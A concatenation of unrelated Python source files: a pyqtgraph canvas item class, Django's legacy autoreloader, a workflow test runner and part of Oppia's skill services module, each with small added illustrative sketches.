self.updateTransform()
self.selectBox.blockSignals(True)
self.selectBoxToItem()
self.selectBox.blockSignals(False)
self.sigTransformChanged.emit(self)
self.sigTransformChangeFinished.emit(self)
def resetTransformClicked(self):
self.resetUserTransform()
self.sigResetUserTransform.emit(self)
def restoreTransform(self, tr):
try:
self.userTransform = SRTTransform(tr)
self.updateTransform()
self.selectBoxFromUser() ## move select box to match
self.sigTransformChanged.emit(self)
self.sigTransformChangeFinished.emit(self)
except:
self.userTransform = SRTTransform()
debug.printExc("Failed to load transform:")
def saveTransform(self):
"""Return a dict containing the current user transform"""
return self.userTransform.saveState()
def selectBoxFromUser(self):
"""Move the selection box to match the current userTransform"""
## user transform
#trans = QtGui.QTransform()
#trans.translate(*self.userTranslate)
#trans.rotate(-self.userRotate)
#x2, y2 = trans.map(*self.selectBoxBase['pos'])
self.selectBox.blockSignals(True)
self.selectBox.setState(self.selectBoxBase)
self.selectBox.applyGlobalTransform(self.userTransform)
#self.selectBox.setAngle(self.userRotate)
#self.selectBox.setPos([x2, y2])
self.selectBox.blockSignals(False)
def selectBoxToItem(self):
"""Move/scale the selection box so it fits the item's bounding rect. (assumes item is not rotated)"""
self.itemRect = self._graphicsItem.boundingRect()
rect = self._graphicsItem.mapRectToParent(self.itemRect)
self.selectBox.blockSignals(True)
self.selectBox.setPos([rect.x(), rect.y()])
self.selectBox.setSize(rect.size())
self.selectBox.setAngle(0)
self.selectBoxBase = self.selectBox.getState().copy()
self.selectBox.blockSignals(False)
def zValue(self):
return self.opts['z']
def setZValue(self, z):
self.opts['z'] = z
if z is not None:
self._graphicsItem.setZValue(z)
def selectionChanged(self, sel, multi):
"""
Inform the item that its selection state has changed.
============== =========================================================
**Arguments:**
sel (bool) whether the item is currently selected
multi (bool) whether there are multiple items currently
selected
============== =========================================================
"""
self.selectedAlone = sel and not multi
self.showSelectBox()
if self.selectedAlone:
self.ctrlWidget().show()
else:
self.ctrlWidget().hide()
def showSelectBox(self):
"""Display the selection box around this item if it is selected and movable"""
if self.selectedAlone and self.isMovable() and self.isVisible(): #and len(self.canvas.itemList.selectedItems())==1:
self.selectBox.show()
else:
self.selectBox.hide()
def hideSelectBox(self):
self.selectBox.hide()
def selectBoxChanged(self):
self.selectBoxMoved()
self.sigTransformChanged.emit(self)
def selectBoxChangeFinished(self):
self.sigTransformChangeFinished.emit(self)
def alphaPressed(self):
"""Hide selection box while slider is moving"""
self.hideSelectBox()
def alphaReleased(self):
self.showSelectBox()
def show(self):
if self.opts['visible']:
return
self.opts['visible'] = True
self._graphicsItem.show()
self.showSelectBox()
self.sigVisibilityChanged.emit(self)
def hide(self):
if not self.opts['visible']:
return
self.opts['visible'] = False
self._graphicsItem.hide()
self.hideSelectBox()
self.sigVisibilityChanged.emit(self)
def setVisible(self, vis):
if vis:
self.show()
else:
self.hide()
def isVisible(self):
return self.opts['visible']
def saveState(self):
return {
'type': self.__class__.__name__,
'name': self.name,
'visible': self.isVisible(),
'alpha': self.alpha(),
'userTransform': self.saveTransform(),
'z': self.zValue(),
'scalable': self.opts['scalable'],
'rotatable': self.opts['rotatable'],
'movable': self.opts['movable'],
}
def restoreState(self, state):
self.setVisible(state['visible'])
self.setAlpha(state['alpha'])
self.restoreTransform(state['userTransform'])
self.setZValue(state['z'])
class GroupCanvasItem(CanvasItem):
"""
Canvas item used for grouping others
"""
def __init__(self, **opts):
defOpts = {'movable': False, 'scalable': False}
defOpts.update(opts)
item = ItemGroup()
CanvasItem.__init__(self, item, **defOpts)
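# Illustrative sketch (plain numpy, not pyqtgraph's SRTTransform) of why the
# composition order base * user * temp in updateTransform() matters: 2D affine
# transforms do not commute, so translating then rotating is not the same as
# rotating then translating.
import numpy as np

def _composition_order_demo():
    def translation(tx, ty):
        return np.array([[1, 0, tx], [0, 1, ty], [0, 0, 1]], dtype=float)

    def rotation(deg):
        a = np.radians(deg)
        return np.array([[np.cos(a), -np.sin(a), 0],
                         [np.sin(a),  np.cos(a), 0],
                         [0,          0,         1]], dtype=float)

    p = np.array([1.0, 0.0, 1.0])                  # point in homogeneous coordinates
    print(translation(10, 0) @ rotation(90) @ p)   # rotate first, then translate
    print(rotation(90) @ translation(10, 0) @ p)   # translate first, then rotate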
|
|
# Autoreloading launcher.
# Borrowed from Peter Hunt and the CherryPy project (http://www.cherrypy.org).
# Some taken from Ian Bicking's Paste (http://pythonpaste.org/).
#
# Portions copyright (c) 2004, CherryPy Team ([email protected])
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the CherryPy Team nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import signal
import subprocess
import sys
import time
import traceback
import _thread
from django.apps import apps
from django.conf import settings
from django.core.signals import request_finished
from django.utils import six
# This import does nothing, but it's necessary to avoid some race conditions
# in the threading module. See http://code.djangoproject.com/ticket/2330 .
try:
import threading # NOQA
except ImportError:
pass
try:
import termios
except ImportError:
termios = None
USE_INOTIFY = False
try:
# Test whether inotify is enabled and likely to work
import pyinotify
fd = pyinotify.INotifyWrapper.create().inotify_init()
if fd >= 0:
USE_INOTIFY = True
os.close(fd)
except ImportError:
pass
RUN_RELOADER = True
FILE_MODIFIED = 1
I18N_MODIFIED = 2
_mtimes = {}
_win = (sys.platform == "win32")
_exception = None
_error_files = []
_cached_modules = set()
_cached_filenames = []
def gen_filenames(only_new=False):
"""
Returns a list of filenames referenced in sys.modules and translation
files.
"""
# N.B. ``list(...)`` is needed, because this runs in parallel with
# application code which might be mutating ``sys.modules``, and this will
# fail with RuntimeError: cannot mutate dictionary while iterating
global _cached_modules, _cached_filenames
module_values = set(sys.modules.values())
_cached_filenames = clean_files(_cached_filenames)
if _cached_modules == module_values:
# No changes in module list, short-circuit the function
if only_new:
return []
else:
return _cached_filenames + clean_files(_error_files)
new_modules = module_values - _cached_modules
new_filenames = clean_files(
[filename.__file__ for filename in new_modules
if hasattr(filename, '__file__')])
if not _cached_filenames and settings.USE_I18N:
# Add the names of the .mo files that can be generated
# by compilemessages management command to the list of files watched.
basedirs = [os.path.join(os.path.dirname(os.path.dirname(__file__)),
'conf', 'locale'),
'locale']
for app_config in reversed(list(apps.get_app_configs())):
basedirs.append(os.path.join(app_config.path, 'locale'))
basedirs.extend(settings.LOCALE_PATHS)
basedirs = [os.path.abspath(basedir) for basedir in basedirs
if os.path.isdir(basedir)]
for basedir in basedirs:
for dirpath, dirnames, locale_filenames in os.walk(basedir):
for filename in locale_filenames:
if filename.endswith('.mo'):
new_filenames.append(os.path.join(dirpath, filename))
_cached_modules = _cached_modules.union(new_modules)
_cached_filenames += new_filenames
if only_new:
return new_filenames + clean_files(_error_files)
else:
return _cached_filenames + clean_files(_error_files)
def clean_files(filelist):
filenames = []
for filename in filelist:
if not filename:
continue
if filename.endswith(".pyc") or filename.endswith(".pyo"):
filename = filename[:-1]
if filename.endswith("$py.class"):
filename = filename[:-9] + ".py"
if os.path.exists(filename):
filenames.append(filename)
return filenames
def reset_translations():
import gettext
from django.utils.translation import trans_real
gettext._translations = {}
trans_real._translations = {}
trans_real._default = None
trans_real._active = threading.local()
def inotify_code_changed():
"""
Checks for changed code using inotify. After being called
it blocks until a change event has been fired.
"""
class EventHandler(pyinotify.ProcessEvent):
modified_code = None
def process_default(self, event):
if event.path.endswith('.mo'):
EventHandler.modified_code = I18N_MODIFIED
else:
EventHandler.modified_code = FILE_MODIFIED
wm = pyinotify.WatchManager()
notifier = pyinotify.Notifier(wm, EventHandler())
def update_watch(sender=None, **kwargs):
if sender and getattr(sender, 'handles_files', False):
# No need to update watches when request serves files.
# (sender is supposed to be a django.core.handlers.BaseHandler subclass)
return
mask = (
pyinotify.IN_MODIFY |
pyinotify.IN_DELETE |
pyinotify.IN_ATTRIB |
pyinotify.IN_MOVED_FROM |
pyinotify.IN_MOVED_TO |
pyinotify.IN_CREATE |
pyinotify.IN_DELETE_SELF |
pyinotify.IN_MOVE_SELF
)
for path in gen_filenames(only_new=True):
wm.add_watch(path, mask)
# New modules may get imported when a request is processed.
request_finished.connect(update_watch)
# Block until an event happens.
update_watch()
notifier.check_events(timeout=None)
notifier.read_events()
notifier.process_events()
notifier.stop()
# If we are here the code must have changed.
return EventHandler.modified_code
def code_changed():
global _mtimes, _win
for filename in gen_filenames():
stat = os.stat(filename)
mtime = stat.st_mtime
if _win:
mtime -= stat.st_ctime
if filename not in _mtimes:
_mtimes[filename] = mtime
continue
if mtime != _mtimes[filename]:
_mtimes = {}
try:
del _error_files[_error_files.index(filename)]
except ValueError:
pass
return I18N_MODIFIED if filename.endswith('.mo') else FILE_MODIFIED
return False
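# Standalone sketch (not part of Django's API) of the mtime-polling idea that
# code_changed() implements above: remember each file's modification time and
# report which files changed since the last poll.
import os as _os

_seen_mtimes = {}

def _files_changed(filenames):
    changed = []
    for name in filenames:
        mtime = _os.stat(name).st_mtime
        if _seen_mtimes.setdefault(name, mtime) != mtime:
            _seen_mtimes[name] = mtime
            changed.append(name)
    return changed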
def check_errors(fn):
def wrapper(*args, **kwargs):
global _exception
try:
fn(*args, **kwargs)
except Exception:
_exception = sys.exc_info()
et, ev, tb = _exception
if getattr(ev, 'filename', None) is None:
# get the filename from the last item in the stack
filename = traceback.extract_tb(tb)[-1][0]
else:
filename = ev.filename
if filename not in _error_files:
_error_files.append(filename)
raise
return wrapper
def raise_last_exception():
global _exception
if _exception is not None:
six.reraise(*_exception)
def ensure_echo_on():
if termios:
fd = sys.stdin
if fd.isatty():
attr_list = termios.tcgetattr(fd)
if not attr_list[3] & termios.ECHO:
attr_list[3] |= termios.ECHO
if hasattr(signal, 'SIGTTOU'):
old_handler = signal.signal(signal.SIGTTOU, signal.SIG_IGN)
else:
old_handler = None
termios.tcsetattr(fd, termios.TCSANOW, attr_list)
if old_handler is not None:
signal.signal(signal.SIGTTOU, old_handler)
def reloader_thread():
ensure_echo_on()
if USE_INOTIFY:
fn = inotify_code_changed
else:
fn = code_changed
while RUN_RELOADER:
change = fn()
if change == FILE_MODIFIED:
sys.exit(3) # force reload
elif change == I18N_MODIFIED:
reset_translations()
time.sleep(1)
def restart_with_reloader():
while True:
args = [sys.executable] + ['-W%s' % o for o in sys.warnoptions] + sys.argv
new_environ = os.environ.copy()
new_environ["RUN_MAIN"] = 'true'
exit_code = subprocess.call(args, env=new_environ)
if exit_code != 3:
return exit_code
def python_reloader(main_func, args, kwargs):
if os.environ.get("RUN_MAIN") == "true":
_thread.start_new_thread(main_func, args, kwargs)
try:
reloader_thread()
except KeyboardInterrupt:
pass
else:
try:
exit_code = restart_with_reloader()
if exit_code < 0:
os.kill(os.getpid(), -exit_code)
else:
sys.exit(exit_code)
except KeyboardInterrupt:
pass
def jython_reloader(main_func, args, kwargs):
from _systemrestart import SystemRestart
_thread.start_new_thread(main_func, args)
while True:
if code_changed():
raise SystemRestart
time.sleep(1)
def main(main_func, args=None, kwargs=None):
if args is None:
args = ()
if kwargs is None:
kwargs = {}
if sys.platform.startswith('java'):
reloader = jython_reloader
else:
reloader = python_reloader
wrapped_main_func = check_errors(main_func)
reloader(wrapped_main_func, args, kwargs)
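# Minimal standalone sketch (not Django's public API) of the restart convention
# used by restart_with_reloader()/python_reloader() above: the parent process
# re-runs the same command with RUN_MAIN set and keeps restarting the child for
# as long as it exits with code 3.
import os as _os
import subprocess as _subprocess
import sys as _sys

def _restart_forever(argv):
    while True:
        env = dict(_os.environ, RUN_MAIN='true')
        exit_code = _subprocess.call([_sys.executable] + argv, env=env)
        if exit_code != 3:   # any other exit code means "stop reloading"
            return exit_code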
|
|
import json
from deciders.test_01 import test_01
from deciders.test_02 import test_02
from deciders.test_03 import test_03
from deciders.test_04 import test_04
from deciders.test_05 import test_05
from deciders.test_06 import test_06
from deciders.test_07 import test_07
from deciders.test_08 import test_08
from deciders.test_09 import test_09
from deciders.test_10 import test_10
from deciders.test_11 import test_11
from deciders.test_12 import test_12
from deciders.test_13 import test_13
from deciders.test_14 import test_14
from deciders.test_15 import test_15
from deciders.test_16 import test_16
from deciders.test_17 import test_17
from test_helper import get_activity_result, docprint, print_result, print_details
from activity_worker import ActivityWorkerProcess
worker1 = ActivityWorkerProcess(domain='floto_test', task_list='floto_activities')
worker2 = ActivityWorkerProcess(domain='floto_test', task_list='floto_activities')
worker1.start()
worker2.start()
@docprint
def run_01():
"""
Test 01
Single task with context
"""
result = test_01()
result_activity_1 = get_activity_result(result, 'activity1', 'v5')
print_result(result)
assert result_activity_1['workflow'] == {'foo': 'bar'}
assert result_activity_1['status'] == 'finished'
@docprint
def run_02():
"""Test 02
Single task without context
"""
result = test_02()
result_activity_2 = get_activity_result(result, 'activity2', 'v4')
print_result(result)
assert result_activity_2['status'] == 'finished'
@docprint
def run_03():
"""Test 03
Two tasks without dependency, run in parallel if > 1 worker
"""
result = test_03()
result1 = get_activity_result(result, 'activity1', 'v5')
result2 = get_activity_result(result, 'activity2', 'v4')
print_result(result)
assert result1['workflow'] == {'foo': 'bar'}
assert result1['status'] == 'finished'
assert result2['status'] == 'finished'
@docprint
def run_04():
"""Test 04
    Two tasks with dependency 1 -> 3
"""
result = test_04()
result3 = get_activity_result(result, 'activity3', 'v2')
print_result(result)
assert result3['activity1']['status'] == 'finished'
assert result3['activity1']['workflow'] == {'foo': 'bar'}
assert result3['status'] == 'finished'
@docprint
def run_05():
"""Test 05
Failing task with retry strategy, succeeds after retry
"""
result = test_05()
result3 = get_activity_result(result, 'activity_fails_3', 'v2')
print_result(result)
assert result3['workflow_input'] == {'foo': 'bar'}
assert result3['status'] == 'finished'
@docprint
def run_06():
"""Test 06
Failing task with retry strategy, reaches limit of retries
"""
details = test_06()
details2 = get_activity_result(details, 'activity_fails_2', 'v2')
print_details(details)
assert details2 == 'Something went wrong'
@docprint
def run_07():
"""Test 07
Timeout
"""
result = test_07()
result2 = get_activity_result(result, 'activity2', 'v4')
print_result(result)
assert result2['status'] == 'finished'
@docprint
def run_08():
"""Test 08
Repeated Workflow
"""
result = test_08()
print_result(result)
result1 = get_activity_result(result, 'activity1', 'v5')
assert result1['status'] == 'finished'
@docprint
def run_09():
"""Test 09
Repeated Workflow with timer and failing activity with retries
"""
result = test_09()
print_result(result)
result4 = get_activity_result(result, 'activity4', 'v2')
assert [r for r in result4.keys() if 'activity1' in r]
assert [r for r in result4.keys() if 'activity2' in r]
@docprint
def run_10():
"""Test 10
Testing heartbeat: Heartbeat(20s) < execution time of activity5_v2 (30s)
"""
result = test_10()
result = get_activity_result(result, 'activity5', 'v2')
print('Result: ' + json.dumps(result) + '\n')
assert result['status'] == 'finished'
@docprint
def run_11():
"""Test 11
Decider times out, succeeds after next decision task
Prints a warning due to Decider timeout
"""
result = test_11()
result = get_activity_result(result, 'activity1', 'v5')
print('Result: ' + json.dumps(result) + '\n')
assert result['workflow'] == {'foo': 'bar'}
assert result['status'] == 'finished'
@docprint
def run_12():
"""Test 12
run_09 with 2 parallel deciders
"""
result = test_12()
result = get_activity_result(result, 'activity4', 'v2')
print('Result: ' + json.dumps(result) + '\n')
assert [r for r in result.keys() if 'activity1' in r]
assert [r for r in result.keys() if 'activity2' in r]
@docprint
def run_13():
"""Test 13
Two parallel deciders, one of them times out
"""
result = test_13()
print_result(result)
result4 = get_activity_result(result, 'activity4', 'v2')
assert [r for r in result4.keys() if 'activity1' in r]
assert [r for r in result4.keys() if 'activity2' in r]
@docprint
def run_14():
"""Test 14
Simple test with child workflow
"""
result = test_14()
print_result(result)
result_cw = get_activity_result(result, 'test_child_workflow', 'v2')
assert [r for r in result_cw.keys() if 'activity2' in r]
@docprint
def run_15():
"""Test 15
Workflow schedules a child workflow.
"""
result = test_15()
print_result(result)
result_child_workflow = get_activity_result(result, 'test_child_workflow', 'v2')
result_activity = get_activity_result(result_child_workflow, 'activity1', 'v5')
assert result_activity['status'] == 'finished'
@docprint
def run_16():
"""Test 16
Failing Task in ChildWorkflow
"""
result = test_16()
print_result(result)
result_child_workflow = get_activity_result(result, 'test_child_workflow', 'v2')
result_activity = get_activity_result(result_child_workflow, 'activity_fails_2', 'v2')
assert result_activity == 'Something went wrong'
@docprint
def run_17():
"""Test 17
    Activity generates tasks. Two deciders, one times out.
"""
result = test_17()
print_result(result)
result_activity_6 = get_activity_result(result, 'activity6', 'v1')
assert set(result_activity_6) == set(['a.in', 'b.in'])
tests = [run_01, run_02, run_03, run_04, run_05, run_06, run_07, run_08, run_09, run_10, run_11,
run_12, run_13, run_14, run_15, run_16, run_17]
try:
    [t() for t in tests]
except (KeyboardInterrupt, SystemExit):
    worker1.terminate()
    worker2.terminate()
    raise
print()
print('All workflows finished successfully.')
worker1.terminate()
worker2.terminate()
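# Hypothetical sketch of what a decorator like ``docprint`` (imported from
# test_helper, whose implementation is not shown here) could look like: it
# prints a test's docstring before running it, matching how the run_* tests
# above are labelled on the console.
import functools

def _docprint_sketch(func):
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        if func.__doc__:
            print(func.__doc__.strip())
        return func(*args, **kwargs)
    return wrapper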
|
|
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Commands that can be used to operate on skills."""
from __future__ import annotations
import collections
import logging
from core import feconf
from core.constants import constants
from core.domain import caching_services
from core.domain import config_domain
from core.domain import html_cleaner
from core.domain import opportunity_services
from core.domain import role_services
from core.domain import skill_domain
from core.domain import skill_fetchers
from core.domain import state_domain
from core.domain import suggestion_services
from core.domain import taskqueue_services
from core.domain import topic_domain
from core.domain import topic_fetchers
from core.domain import topic_services
from core.domain import user_services
from core.platform import models
(skill_models, user_models, question_models, topic_models) = (
models.Registry.import_models([
models.NAMES.skill, models.NAMES.user, models.NAMES.question,
models.NAMES.topic]))
datastore_services = models.Registry.import_datastore_services()
# Repository GET methods.
def get_merged_skill_ids():
"""Returns the skill IDs of skills that have been merged.
Returns:
list(str). List of skill IDs of merged skills.
"""
return [skill.id for skill in skill_models.SkillModel.get_merged_skills()]
def get_all_skill_summaries():
"""Returns the summaries of all skills present in the datastore.
Returns:
list(SkillSummary). The list of summaries of all skills present in the
datastore.
"""
skill_summaries_models = skill_models.SkillSummaryModel.get_all()
skill_summaries = [
get_skill_summary_from_model(summary)
for summary in skill_summaries_models]
return skill_summaries
def _get_skill_summaries_in_batches(
num_skills_to_fetch, urlsafe_start_cursor, sort_by):
"""Returns the summaries of skills present in the datastore.
Args:
num_skills_to_fetch: int. Number of skills to fetch.
urlsafe_start_cursor: str or None. The cursor to the next page.
sort_by: str. A string indicating how to sort the result.
Returns:
        3-tuple(skill_summaries, new_urlsafe_start_cursor, more). Where:
            skill_summaries: list(SkillSummary). The list of skill summaries.
                More skill summaries than requested may be returned; the
                cursor therefore represents the point up to which results were
                fetched (and not the "num_skills_to_fetch" point).
            new_urlsafe_start_cursor: str or None. A query cursor pointing to
                the next batch of results. If there are no more results, this
                might be None.
more: bool. If True, there are (probably) more results after this
batch. If False, there are no further results after this batch.
"""
    # The fetched skills will be filtered afterwards, and filtering may leave
    # fewer skills than requested. Fetching twice the requested number of
    # skills helps reduce the number of datastore calls.
skill_summaries_models, new_urlsafe_start_cursor, more = (
skill_models.SkillSummaryModel.fetch_page(
2 * num_skills_to_fetch, urlsafe_start_cursor, sort_by))
skill_summaries = [
get_skill_summary_from_model(summary)
for summary in skill_summaries_models]
return skill_summaries, new_urlsafe_start_cursor, more
def get_filtered_skill_summaries(
num_skills_to_fetch, status, classroom_name, keywords,
sort_by, urlsafe_start_cursor):
"""Returns all the skill summary dicts after filtering.
Args:
num_skills_to_fetch: int. Number of skills to fetch.
status: str. The status of the skill.
        classroom_name: str. The classroom_name of the topic to which the skill
            is assigned.
keywords: list(str). The keywords to look for
in the skill description.
sort_by: str. A string indicating how to sort the result.
urlsafe_start_cursor: str or None. The cursor to the next page.
Returns:
3-tuple(augmented_skill_summaries, new_urlsafe_start_cursor, more).
Where:
            augmented_skill_summaries: list(AugmentedSkillSummary). The list of
                augmented skill summaries. More skills than requested may be
                returned; the cursor therefore represents the point up to which
                results were fetched (and not the "num_skills_to_fetch" point).
new_urlsafe_start_cursor: str or None. A query cursor pointing to
the next batch of results. If there are no more results, this
might be None.
more: bool. If True, there are (probably) more results after this
batch. If False, there are no further results after this batch.
"""
augmented_skill_summaries = []
new_urlsafe_start_cursor = urlsafe_start_cursor
more = True
while len(augmented_skill_summaries) < num_skills_to_fetch and more:
augmented_skill_summaries_batch, new_urlsafe_start_cursor, more = (
_get_augmented_skill_summaries_in_batches(
num_skills_to_fetch, new_urlsafe_start_cursor, sort_by))
filtered_augmented_skill_summaries = _filter_skills_by_status(
augmented_skill_summaries_batch, status)
filtered_augmented_skill_summaries = _filter_skills_by_classroom(
filtered_augmented_skill_summaries, classroom_name)
filtered_augmented_skill_summaries = _filter_skills_by_keywords(
filtered_augmented_skill_summaries, keywords)
augmented_skill_summaries.extend(filtered_augmented_skill_summaries)
return augmented_skill_summaries, new_urlsafe_start_cursor, more
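# Generic sketch (plain Python, no datastore) of the fetch-filter-accumulate
# loop used in get_filtered_skill_summaries() above: keep pulling batches until
# enough items survive the filters or there are no more results.
def _collect_filtered(fetch_batch, keep, wanted):
    results, cursor, more = [], None, True
    while len(results) < wanted and more:
        batch, cursor, more = fetch_batch(cursor)
        results.extend(item for item in batch if keep(item))
    return results, cursor, more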
def _get_augmented_skill_summaries_in_batches(
num_skills_to_fetch, urlsafe_start_cursor, sort_by):
"""Returns all the Augmented skill summaries after attaching
topic and classroom.
Returns:
3-tuple(augmented_skill_summaries, urlsafe_start_cursor, more). Where:
augmented_skill_summaries: list(AugmentedSkillSummary). The list of
skill summaries.
urlsafe_start_cursor: str or None. A query cursor pointing to the
next batch of results. If there are no more results, this might
be None.
more: bool. If True, there are (probably) more results after this
batch. If False, there are no further results after this batch.
"""
skill_summaries, new_urlsafe_start_cursor, more = (
_get_skill_summaries_in_batches(
num_skills_to_fetch, urlsafe_start_cursor, sort_by))
assigned_skill_ids = collections.defaultdict(lambda: {
'topic_names': [],
'classroom_names': []
})
all_topic_models = topic_models.TopicModel.get_all()
all_topics = [topic_fetchers.get_topic_from_model(topic_model)
if topic_model is not None else None
for topic_model in all_topic_models]
topic_classroom_dict = {}
all_classrooms_dict = config_domain.CLASSROOM_PAGES_DATA.value
for classroom in all_classrooms_dict:
for topic_id in classroom['topic_ids']:
topic_classroom_dict[topic_id] = classroom['name']
for topic in all_topics:
for skill_id in topic.get_all_skill_ids():
assigned_skill_ids[skill_id]['topic_names'].append(topic.name)
assigned_skill_ids[skill_id]['classroom_names'].append(
topic_classroom_dict.get(topic.id, None))
augmented_skill_summaries = []
for skill_summary in skill_summaries:
topic_names = []
classroom_names = []
if skill_summary.id in assigned_skill_ids:
topic_names = assigned_skill_ids[skill_summary.id]['topic_names']
classroom_names = (
assigned_skill_ids[skill_summary.id]['classroom_names'])
augmented_skill_summary = skill_domain.AugmentedSkillSummary(
skill_summary.id,
skill_summary.description,
skill_summary.language_code,
skill_summary.version,
skill_summary.misconception_count,
skill_summary.worked_examples_count,
topic_names,
classroom_names,
skill_summary.skill_model_created_on,
skill_summary.skill_model_last_updated)
augmented_skill_summaries.append(augmented_skill_summary)
return augmented_skill_summaries, new_urlsafe_start_cursor, more
def _filter_skills_by_status(augmented_skill_summaries, status):
"""Returns the skill summary dicts after filtering by status.
Args:
augmented_skill_summaries: list(AugmentedSkillSummary). The list
of augmented skill summaries.
status: str. The status of the skill.
Returns:
list(AugmentedSkillSummary). The list of AugmentedSkillSummaries
matching the given status.
"""
if status is None or status == constants.SKILL_STATUS_OPTIONS['ALL']:
return augmented_skill_summaries
elif status == constants.SKILL_STATUS_OPTIONS['UNASSIGNED']:
unassigned_augmented_skill_summaries = []
for augmented_skill_summary in augmented_skill_summaries:
if not augmented_skill_summary.topic_names:
unassigned_augmented_skill_summaries.append(
augmented_skill_summary)
return unassigned_augmented_skill_summaries
elif status == constants.SKILL_STATUS_OPTIONS['ASSIGNED']:
assigned_augmented_skill_summaries = []
for augmented_skill_summary in augmented_skill_summaries:
if augmented_skill_summary.topic_names:
assigned_augmented_skill_summaries.append(
augmented_skill_summary)
return assigned_augmented_skill_summaries
def _filter_skills_by_classroom(augmented_skill_summaries, classroom_name):
"""Returns the skill summary dicts after filtering by classroom_name.
Args:
augmented_skill_summaries: list(AugmentedSkillSummary).
The list of augmented skill summaries.
        classroom_name: str. The classroom_name of the topic to which the skill
            is assigned.
Returns:
list(AugmentedSkillSummary). The list of augmented skill summaries with
the given classroom name.
"""
if classroom_name is None or classroom_name == 'All':
return augmented_skill_summaries
augmented_skill_summaries_with_classroom_name = []
for augmented_skill_summary in augmented_skill_summaries:
if classroom_name in augmented_skill_summary.classroom_names:
augmented_skill_summaries_with_classroom_name.append(
augmented_skill_summary)
return augmented_skill_summaries_with_classroom_name
def _filter_skills_by_keywords(augmented_skill_summaries, keywords):
"""Returns whether the keywords match the skill description.
Args:
augmented_skill_summaries: list(AugmentedSkillSummary). The augmented
skill summaries.
keywords: list(str). The keywords to match.
Returns:
list(AugmentedSkillSummary). The list of augmented skill summaries
matching the given keywords.
"""
if not keywords:
return augmented_skill_summaries
filtered_augmented_skill_summaries = []
for augmented_skill_summary in augmented_skill_summaries:
if any((augmented_skill_summary.description.lower().find(
keyword.lower()) != -1) for keyword in keywords):
filtered_augmented_skill_summaries.append(augmented_skill_summary)
return filtered_augmented_skill_summaries
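# Illustrative sketch (plain strings, no domain objects) of the keyword match
# performed by _filter_skills_by_keywords() above: a description matches if it
# contains any of the keywords, case-insensitively.
def _keyword_match_sketch():
    descriptions = ['Adding Fractions', 'Dividing Decimals']
    keywords = ['fraction']
    return [d for d in descriptions
            if any(k.lower() in d.lower() for k in keywords)]  # ['Adding Fractions']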
def get_multi_skill_summaries(skill_ids):
"""Returns a list of skill summaries matching the skill IDs provided.
Args:
skill_ids: list(str). List of skill IDs to get skill summaries for.
Returns:
list(SkillSummary). The list of summaries of skills matching the
provided IDs.
"""
skill_summaries_models = skill_models.SkillSummaryModel.get_multi(skill_ids)
skill_summaries = [
get_skill_summary_from_model(skill_summary_model)
for skill_summary_model in skill_summaries_models
if skill_summary_model is not None]
return skill_summaries
def get_rubrics_of_skills(skill_ids):
"""Returns a list of rubrics corresponding to given skills.
Args:
skill_ids: list(str). The list of skill IDs.
Returns:
dict, list(str). The skill rubrics of skills keyed by their
corresponding ids and the list of deleted skill ids, if any.
"""
skills = skill_fetchers.get_multi_skills(skill_ids, strict=False)
skill_id_to_rubrics_dict = {}
for skill in skills:
if skill is not None:
rubric_dicts = [rubric.to_dict() for rubric in skill.rubrics]
skill_id_to_rubrics_dict[skill.id] = rubric_dicts
deleted_skill_ids = []
for skill_id in skill_ids:
if skill_id not in skill_id_to_rubrics_dict:
skill_id_to_rubrics_dict[skill_id] = None
deleted_skill_ids.append(skill_id)
return skill_id_to_rubrics_dict, deleted_skill_ids
def get_descriptions_of_skills(skill_ids):
"""Returns a list of skill descriptions corresponding to the given skills.
Args:
skill_ids: list(str). The list of skill ids.
Returns:
dict, list(str). The skill descriptions of skills keyed by their
corresponding ids and the list of deleted skill ids, if any.
"""
skill_summaries = get_multi_skill_summaries(skill_ids)
skill_id_to_description_dict = {}
for skill_summary in skill_summaries:
if skill_summary is not None:
skill_id_to_description_dict[skill_summary.id] = (
skill_summary.description)
deleted_skill_ids = []
for skill_id in skill_ids:
if skill_id not in skill_id_to_description_dict:
skill_id_to_description_dict[skill_id] = None
deleted_skill_ids.append(skill_id)
return skill_id_to_description_dict, deleted_skill_ids
def get_skill_summary_from_model(skill_summary_model):
"""Returns a domain object for an Oppia skill summary given a
skill summary model.
Args:
skill_summary_model: SkillSummaryModel. The skill summary model object
to get corresponding domain object.
Returns:
        SkillSummary. The domain object corresponding to the given skill
        summary model.
"""
return skill_domain.SkillSummary(
skill_summary_model.id, skill_summary_model.description,
skill_summary_model.language_code,
skill_summary_model.version,
skill_summary_model.misconception_count,
skill_summary_model.worked_examples_count,
skill_summary_model.skill_model_created_on,
skill_summary_model.skill_model_last_updated
)
def get_image_filenames_from_skill(skill):
"""Get the image filenames from the skill.
Args:
